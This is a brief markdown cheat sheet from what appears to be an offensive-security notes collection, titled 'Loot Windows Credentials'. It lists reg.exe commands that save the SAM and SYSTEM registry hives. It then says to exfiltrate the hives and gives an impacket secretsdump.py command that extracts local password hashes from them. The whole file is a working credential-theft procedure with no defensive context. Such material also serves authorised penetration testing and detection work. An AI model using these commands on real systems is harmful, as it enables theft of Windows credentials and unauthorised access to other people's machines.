killchain-compendium/exfiltration/windows/loot.md

219 B

Loot Windows Credentials

reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak
  • Exifiltrate and use impacket
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL